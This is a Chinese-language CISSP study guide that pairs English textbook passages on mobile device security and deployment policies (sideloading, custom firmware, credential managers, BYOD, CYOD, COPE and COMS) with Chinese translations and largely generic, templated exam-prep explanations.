入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 81 / PDF P624

第 624 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

“Bricking” refers to rendering a device completely nonfunctional or as useless as a brick, typically through a malfunction or intentional action. When a device is “bricked,” it loses its normal functionality and becomes inoperable, often requiring significant efforts to restore its original state. This term is commonly used in the context of electronic devices such as smartphones, tablets, routers, or other hardware that may become unusable due to software errors, firmware corruption, or unauthorized modifications.

“Bricking” has become less of a concern with modern devices, which often include a nonreplaceable recovery ROM in addition to its standard flashable firmware (i.e., updatable firmware). Sideloading Sideloading is the activity of installing an app on a device by bringing the installer file to the device through some form of file transfer or USB storage method. Most organizations should prohibit user sideloading, because it may be a means to bypass security restrictions imposed by an app store, application allow listing, or the MDM/UEM/MAM. An MDM/UEM/MAMenforced configuration can require that all apps be digitally signed; this would eliminate sideloading and likely jailbreaking as well.

Custom Firmware Mobile devices come preinstalled with a vendoror telco-provided firmware or core OS. If a device is rooted or jailbroken, it can allow the user to install alternate custom firmware in place of the default firmware. Custom firmware may remove bloatware, add or remove features, and streamline the OS to optimize performance. You can find online discussion forums and communities, such as xda-developers.com and howardforums.com, that specialize in custom firmware for Apple and Android devices. An organization should not allow users to operate mobile devices that have custom firmware unless that firmware is preapproved by the organization.

Carrier Unlocking Most mobile devices purchased directly from a telco are carrier locked. This means you are unable to use the device on any other telco network until the carrier lock is removed or carrier unlocked. Once you fully own a device, the telco should freely carrier unlock the phone, but you will have to ask for it specifically because they don't do so automatically. If you have an account in good standing and are traveling to another country with compatible telco “

中文直译 / 整理

变砖”是指通过故障或故意行为使设备完全无法使用,变得如同砖块一般无 用。 当设备“变砖”时,它会失去正常功能并变得无法操作,通常需要付出大 量努力才能恢复其原始状态。 该术语常用于描述智能手机、平板电脑、路由器 或其他因软件错误、固件损坏或未经授权的修改而变得无法使用的电子设备。 随着现代设备通常在标准可刷写固件(即可更新固件)之外还内置了不可替换 的恢复ROM,“变砖”已不再像以前那样令人担忧。 侧载 侧载是指通过某种文件传输或USB存储方式将安装文件传输到设备上以安装应 用程序的活动。 大多数组织应禁止用户侧载,因为这可能成为绕过应用商店、 应用程序允许列表或MDM/UEM/MAM所施加的安全限制的手段。 MDM/UEM/MAM强制配置可以要求所有应用程序都经过数字签名; 这将消除 侧载,也可能阻止越狱。 自定义固件 移动设备出厂时预装了厂商或电信运营商提供的固件或核心操作系统。 如果设 备已被root或越狱,则允许用户安装替代的自定义固件以取代默认固件。 自定 义固件可能移除臃肿软件、添加或删除功能,并简化操作系统以优化性能。

您 可以找到专门针对Apple和Android设备的自定义固件的在线讨论论坛和社区, 例如xda-developers.com和howardforums.com。 组织不应允许用户操作具有自定义固件的移动设备,除非该固件已获得组织预先 批准。 运营商解锁 大多数直接从电信公司购买的移动设备都绑定了运营商。 这意味着在解除运营 商锁定或解除运营商绑定之前,您无法在其他电信网络上使用该设备。 一旦您 完全拥有该设备,电信公司应免费解除运营商绑定您的手机,但您必须主动提 出要求,因为他们不会自动执行此操作。 如果您账户状态良好,并计划前往另 一个拥有兼容电信服务的国家

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 624 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

签名支持完整性、真实性和不可否认性,不等于加密全文。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 82 / PDF P625

第 625 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

service, you may be able to get a telco to carrier unlock your phone for your trip so that you can use another SIM card (or eSIM) for local telco services. Having a device carrier unlocked is not the same as rooting. Carrier unlocked status only allows the switching of telco services (which is technically possible only if your device uses the same radio frequencies as the telco). A carrier unlocked device should not represent any additional risk to an organization; thus, there is likely no need for a prohibition of carrier unlocked devices on company networks.

Firmware Over-the-Air (OTA) Updates Firmware over-the-air (OTA) updates are firmware updates that are downloaded from the telco or vendor over-the-air (via a data connection either provided by the carrier or via Wi-Fi). Generally, as a mobile device owner, you should install new firmware OTA updates onto a device once they become available. However, some updates may alter the device configuration or interfere with MDM/UEM restrictions. You should attempt to test new updates before allowing managed devices to receive them.

You may have to establish a waiting period so that the MDM/UEM vendor can update their management product to properly oversee the deployment and configuration of the new firmware update. An organization's standard patch management, configuration management, and change management policies should be applied to mobile devices. Credential Management The storage of credentials in a central location is referred to as credential management. Given the wide range of Internet sites and services, each with its own particular logon requirements, using unique names and passwords can be a burden. Credential management solutions offer a means to securely store a plethora of credential sets.

Often, these tools employ a master credential set (multifactor being preferred) to unlock the dataset when needed. Some credential-management options can even provide auto-login options for apps and websites. A password vault is another term for a credential manager. These are often software solutions, sometimes hardware-based, sometimes local only, and sometimes using cloud storage. They are used to generate and store credentials for sites, services, devices, and whatever other secrets you want to keep private. The vault itself is encrypted and must be unlocked to regain access to the stored items. Most password vaults use Password-Based Key

中文直译 / 整理

服务,您可能可以请电信公司为您旅行期间解除手机的运营商绑定,以便使用另 一张SIM卡(或eSIM)接入当地电信服务。 设备解除运营商锁定并不等同于获取Root权限。 运营商解锁状态仅允许切换电 信服务(技术上仅当您的设备使用与电信运营商相同的无线电频段时才可能实 现)。 解除运营商锁定的设备不应给组织带来额外风险; 因此,很可能无需在 公司网络中禁止使用解除运营商锁定的设备。 固件空中下载(OTA)更新 固件空中下载(OTA)更新是指通过电信运营商或厂商提供的数据连接(由运 营商或Wi‑Fi提供)下载的固件更新。 通常,作为移动设备所有者,您应在新 固件OTA更新可用后立即安装。 然而,某些更新可能会更改设备配置或干扰 MDM/UEM限制。 您应在允许受管设备接收这些新更新之前尝试进行测试。 您可能需要设置一个等待期,以便MDM/UEM供应商能够更新其管理产品, 以正确监督新固件更新的部署和配置。 组织的标准补丁管理、配置管理和变更 管理策略应适用于移动设备。 凭据管理 将凭据存储在中心位置称为凭据管理。 鉴于互联网站点和服务种类繁多,每个 都有其独特的登录要求,使用不同的用户名和密码可能成为负担。

凭据管理解 决方案提供了一种安全存储大量凭据集的方法。 通常,这些工具使用主凭据集 (推荐使用多因素认证)在需要时解锁数据集。 一些凭据管理选项甚至可以为 应用程序和网站提供自动登录功能。 一个 密码保险库 是凭证管理器的另一种说法。 这些通常是软件解决方案,有时 基于硬件,有时仅本地使用,有时则使用云存储。 它们用于生成和存储网站、 服务、设备以及您希望保密的其他秘密的凭证。 保险库本身是加密的,必须解 锁才能访问其中存储的项目。 大多数密码保险库使用基于密码的密钥

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 625 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 83 / PDF P626

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Derivation Function 2 (PBKDF2) or Bcrypt (see Chapter 7) to convert the vault's master password into a reasonably strong encryption key. Text Messaging Short Message Service (SMS), Multimedia Messaging Service (MMS), and Rich Communication Services (RCS) are all useful communication systems, but they also serve as an attack vector (such as smishing and SPIM, discussed in Chapter 2, “Personnel Security and Risk Management Concepts”). These testing and messaging services are primarily operated and supported by the telco providers. Texting can be used as an authentication factor known as SMS-based 2FA.

SMS-based 2FA is better than single-factor password-only authentication, but it is not recommended if any other second-factor option is available. See Chapter 13 for more on SMS-based 2FA. Many non-telco/non-carrier texting and messaging services are supported via apps on mobile devices. It is important to keep any messaging service app updated and restrict its use to nonsensitive content. Mobile Device Deployment Policies A number of deployment models are available for allowing and/or providing mobile devices for employees to use while at work and to perform work tasks when away from the office.

A mobile device deployment policy must address the wide range of security concerns regarding the use of a PED in relation to the organization's IT infrastructure and business tasks. Users need to understand the benefits, restrictions, and consequences of using mobile devices at work and for work. Reading and signing off on the BYOD, CYOD, COPE, COMS/COBO, etc., policy along with attending an overview or training program may be sufficient to accomplish reasonable awareness. These topics are covered in the next sections.

An alternative to allowing personal or business-provided mobile devices to interact with company resources directly would be to implement a VDI or VMI solution (see section “Software-Defined Everything” earlier this chapter). Bring Your Own Device (BYOD)

中文直译 / 整理

派生函数2(PBKDF2)或Bcrypt(参见第7章)将保险库的主密码转换为足够 强大的加密密钥。 短信服务 短消息服务(SMS)、多媒体消息服务(MMS)和增强通信服务(RCS)都是 有用的通信系统,但它们也构成了攻击向量(例如,第第2章中讨论的短信钓鱼 和SPIM)。 这些测试和消息服务主要由电信运营商运营和支持。 短信可作为称 为基于SMS的双因素认证(2FA)的身份验证因子。 基于SMS的2FA优于仅使 用密码的单因素认证,但如果存在其他任何双因素选项,则不建议使用。 有关 基于SMS的2FA的更多信息,请参阅第13章。 许多非电信/非运营商的短信和消息服务可通过移动设备上的应用程序支持。 保持任 何消息服务应用程序更新,并将其使用限制于非敏感内容,这一点非常重要。 移动设备部署策略 为允许和/或向员工提供在工作中使用移动设备以及在办公室外执行工作任务, 有多种部署模型可供选择。 移动设备部署策略必须解决与组织IT基础设施和业 务任务相关的PED使用所涉及的广泛安全问题。 用户需要了解在工作和因工作使用移动设备的好处、限制和后果。

阅读并签 署BYOD、CYOD、COPE、COMS/COBO等政策,并参加概述或培训课程, 可能足以实现合理的意识。 这些主题将在下一节中介绍。 允许个人或企业提供的移动设备直接与公司资源交互的替代方案是 实施 VDI 或 VMI 解决方案(参见本章前面的“软件定义一切”部分)。 自带设备(BYOD)

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 84 / PDF P627

第 627 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Bring your own device (BYOD) is a policy that allows employees to bring their own personal mobile devices to work and may allow them to use those devices to connect to business resources and/or the Internet through the company network. Although BYOD may improve employee morale and job satisfaction, it increases security risk to the organization. If the BYOD policy is open-ended, any device may be allowed to connect to the company network. Not all mobile devices have sufficient security features, and thus such a policy allows noncompliant devices onto the production network.

Employees likely retain full control over their devices, allowing them to disable or bypass security features imposed by the organization. This is likely the least secure option for the organization since company data and applications will be on the personal mobile device, it exposes the organization's network to malicious code from the PEDs, and the devices will have the widest range of variation and security capabilities (or more likely the lack of security capabilities). Additionally, this option potentially exposes the worker's PII on the device to the organization.

Choose Your Own Device (CYOD) The concept of choose your own device (CYOD) provides users with a list of approved devices from which to select the device to implement. A CYOD policy can be implemented so that employees purchase their own devices from the approved list (a BYOD variant). This option attempts to keep the expense of devices the responsibility of workers rather than the organization, but it often results in much more complex and challenging situations. For example, how will it handle a situation wherein a worker has already spent considerable money on a device that is not on the preapproved list? Will they be given money to purchase an approved device?

What about the person who paid for an approved device— will the company reimburse them because they already paid for someone else's device? What about the person who decides they don't want to use a mobile device for work activities—will they be paid the funds anyway, allowing them to treat it as a paycheck bonus? Also, this option has the same security issues as COPE: the potential for malware transfer and the comingling of business and personal data on the same device. Corporate-Owned, Personally Enabled (COPE)

中文直译 / 整理

自带设备(BYOD) 是一种允许员工将个人移动设备带入工作场所的政策,可 能允许他们使用这些设备通过公司网络连接到业务资源和/或互联网。 尽管 BYOD 可能提升员工士气和工作满意度,但它会增加组织的安全风险。 如果 BYOD 政策是开放式的,任何设备都可能被允许连接到公司网络。 并非所有 移动设备都具备足够的安全功能,因此此类政策会将不符合要求的设备引入生 产网络。 员工通常对其设备拥有完全控制权,可以禁用或绕过组织施加的安全 功能。 这可能是组织最不安全的选择,因为公司数据和应用程序将存在于个人移动设 备上,这会使组织的网络暴露于来自PED的恶意代码,并且这些设备的种类和 安全能力差异最大(更可能的是缺乏安全能力)。 此外,此选项还可能使员工 在设备上的PII暴露给组织。 自行选择设备(CYOD) 自行选择设备(CYOD)的概念为用户提供了一份经过批准的设备列表,用户 可从中选择要使用的设备。 可以实施CYOD策略,使员工从批准列表中自行 购买设备(BYOD的一种变体)。 此选项试图将设备费用的责任交由员工而非组织承担,但通常会导致更复杂和 更具挑战性的情况。

例如,如果员工已经花费大量资金购买了不在预批准列表 中的设备,该如何处理? 是否会向他们提供资金以购买批准的设备? 对于那些 已经支付了批准设备费用的人,公司是否会因他们已为他人设备付款而给予补 偿? 对于那些决定不使用移动设备进行工作的人,是否仍会发放资金,使其视 作工资奖金? 此外,此选项与COPE存在相同的安全问题:恶意软件传输的风险以及业务 数据与个人数据在同设备上的混用。 企业所有、个人启用(COPE)

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 627 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 85 / PDF P628

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

Corporate-owned, personally enabled (COPE) is a mobile policy where the organization purchases devices and provides them to employees. Each user is then able to customize the device and use it for both work activities and personal activities. COPE allows the organization to select exactly which devices are to be allowed on the organizational network—specifically only those devices that can be configured into compliance with the security policy. This option reduces the mobile devices to those preselected by the organization and that have the minimum security capabilities mandated by company security policy.

However, this option still has the risk of exposing company data through user error, exposes the organization to malware via the device, and puts worker PII at risk of being accessed by the organization. Corporate-Owned Mobile Strategy (COMS) A corporate-owned mobile strategy (COMS) or corporate-owned, businessonly (COBO) strategy is when the company purchases the mobile devices that can support security compliance with the security policy. These devices are to be used exclusively for company purposes, and users should not perform any personal tasks on the devices. This often requires workers to carry a second device for personal use.

This is the best option for both the organization as well as the individual worker. The option maintains clear separation between work activities and personal activities, since the device is for work use exclusively. This option protects company resources from personal activity risks, and it protects personal data from unauthorized or unethical organizational access. Yes, it is a hassle to carry a second device for personal activities, but that inconvenience is well worth the security benefits for both parties.

Mobile Device Deployment Policy Details No matter which mobile device deployment policy you select and implement, your policy needs to address the many device security features listed earlier in this section. You can ensure this by defining required features and how they are to be configured for company security policy compliance. The mobile device deployment policy must also address several other concerns that are operational, legal, and logistic-based as well. These are discussed in the following sections. Data Ownership

中文直译 / 整理

企业所有、个人可用(COPE)是一种移动策略,组织购买设备并提供给员工。 每位用户均可自定义设备,并将其用于工作和个人活动。 COPE允许组织精确 选择哪些设备可以接入组织网络——具体而言,仅限那些能够配置为符合安全 策略的设备。 此选项将移动设备限制为组织预选且具备公司安全策略所要求的最低安全功 能的设备。 然而,此选项仍存在因用户错误导致公司数据泄露的风险,通过 设备使组织面临恶意软件威胁,并使员工的个人身份信息(PII)面临被组织 访问的风险。 企业所有移动策略(COMS) 一种企业所有移动策略(COMS)或企业所有、仅限业务(COBO)策略是指公 司购买符合安全策略安全合规要求的移动设备。 这些设备应仅用于公司目的, 用户不得在设备上执行任何个人任务。 这通常要求员工携带另一台设备用于个 人用途。 此选项对组织和个人员工而言都是最佳选择。 由于设备仅用于工作用途,该选 项能明确区分工作活动与个人活动。 此选项可保护公司资源免受个人活动风险 的影响,同时保护个人数据不被组织未经授权或不道德地访问。 虽然携带第二 台设备用于个人活动确实不便,但这种不便所带来的安全收益对双方而言都十 分值得。

移动设备部署策略详情 无论您选择并实施哪种移动设备部署策略,您的策略都需要涵盖本节前面列出 的诸多设备安全功能。 您可以通过定义所需功能及其如何配置以符合公司安全 策略来确保这一点。 移动设备部署策略还必须解决其他一些运营、法律和后勤 方面的关切问题,这些问题将在以下章节中讨论。 数据所有权

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

政策:政策是高层原则,说明必须遵守什么。

数据所有者:数据所有者负责决定数据分类、访问规则和保护要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Owner 定规则,Custodian 执行保护。

Policy 高层、强制、稳定;Procedure 具体步骤。

Owner 决策,Custodian 执行,User 按授权使用。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
政策 政策是高层原则,说明必须遵守什么。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 86 / PDF P629

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

When a personal device is used for business tasks, commingling of personal data and business data is likely to occur. Some devices can support storage segmentation, but not all devices can provide data-type isolation. Establishing data ownership can be complicated. For example, if a device is lost or stolen, the company may wish to trigger a remote wipe, clearing the device of all valuable information. However, the employee will often be resistant to this, especially if there is any hope that the device will be found or returned.

A wipe may remove all business and personal data, which may be a significant loss to the individual—especially if the device is recovered, because then the wipe would seem to have been an overreaction. Clear policies about data ownership should be established. Some MDM/UEM solutions can provide data isolation/segmentation and support business data sanitization without affecting personal data. The mobile device deployment policy regarding data ownership should address backups for mobile devices. Business data and personal data should be protected by a backup solution—either a single solution for all data on the device or separate solutions for each type or class of data.

Backups reduce the risk of data loss in the event of a remote-wipe event as well as device failure or damage. Support Ownership When an employee's mobile device experiences a failure, a fault, or damage, who is responsible for the device's repair, replacement, or technical support? The mobile device deployment policy should define what support will be provided by the company and what support is left to the individual and, if relevant, their service provider. Patch and Update Management The mobile device deployment policy should define the means and mechanisms of secure patch management and update management for a personally owned mobile device. Is the user responsible for installing updates?

Should the user install all available updates? Should the organization test updates prior to on-device installation? Are updates to be handled over the air (via service provider) or over Wi-Fi? Are there versions of the mobile OS that cannot be used? What patch or update level is required? These issues should be addressed both for the primary OS of the device and for all apps installed on the device.

中文直译 / 整理

当个人设备用于业务任务时,个人数据与业务数据很可能混合在一起。 某些设 备支持存储分区,但并非所有设备都能实现数据类型隔离。 确立数据所有权可 能比较复杂。 例如,如果设备丢失或被盗,公司可能希望触发远程擦除,清除 设备上的所有重要信息。 然而,员工通常会对此表示抵制,特别是如果还有希 望找回或归还设备的话。 擦除操作可能会删除所有业务数据和个人数据,这对 个人而言可能造成重大损失——尤其是当设备被找回时,擦除操作看起来似乎反 应过度。 应制定明确的数据所有权政策。 一些MDM/UEM解决方案可以提供数 据隔离/分区,并支持在不影响个人数据的情况下清理业务数据。 关于数据所有权的移动设备部署政策应涵盖移动设备的备份。 业务数据和个人 数据应通过备份解决方案加以保护——可以是针对设备上所有数据的单一解决 方案,也可以是分别为每种或每类数据设置的独立解决方案。 备份可降低在远 程擦除、设备故障或损坏时数据丢失的风险。 支持责任 当员工的移动设备发生故障、损坏或出现其他问题时,由谁负责设备的维修、 更换或技术支持? 移动设备部署政策应明确公司提供的支持范围,以及哪些支 持责任由个人(如适用,还包括其服务提供商)承担。

补丁与更新管理 移动设备部署政策应明确个人所有移动设备的安全补丁管理和更新管理的方 式与机制。 用户是否负责安装更新? 用户是否应安装所有可用更新? 组织是 否应在设备上安装前测试更新? 更新应通过空中方式(通过服务提供商)还 是通过Wi‑Fi进行? 是否存在禁止使用的移动操作系统版本? 所需的补丁或更 新级别是什么? 这些问题应同时针对设备的主要操作系统和所有已安装的应 用程序予以明确。

小白解释

场景先行:你是公司的安全负责人,正在读第 629 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

Owner 决策,Custodian 执行,User 按授权使用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
学习单元 87 / PDF P630

第 630 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Security Product Management The mobile device deployment policy should dictate whether antivirus, antimalware, antispyware scanners, firewalls, HIDS, or other security tools are to be installed on mobile devices. The policy should indicate which products/apps are recommended for use, as well as the settings for those solutions. Forensics The mobile device deployment policy should address forensics and investigations related to mobile devices. Users need to be aware that in the event of a security violation or a criminal activity, their devices might be involved. An investigation would mandate gathering evidence from those devices.

Some processes of evidence gathering can be destructive, and some legal investigations require the confiscation of devices. An owner of a personal device may refuse access to the contents of their device, even when that content is, in theory, the property of the organization. A company-owned device could have a secondary account, a master password, or a remote management tool preinstalled that would grant the organization the ability to access the device's contents without the user's consent. In all legal matters, including mobile device forensics and privacy, consult your own attorney(s) for the best course of action and policy contents.

Privacy The mobile device deployment policy should address privacy and monitoring. When a personal device is used for business tasks, the user often loses some or all of the privacy they enjoyed prior to using their mobile device at work. Workers may need to agree to be tracked and monitored on their mobile device, even when not on company property and outside work hours. A personal device in use under BYOD or CYOD should be considered by the individual to be quasi-company property. A primary way for a worker to protect their privacy in regard to a mobile device is to not use a single device for both work and personal activities.

中文直译 / 整理

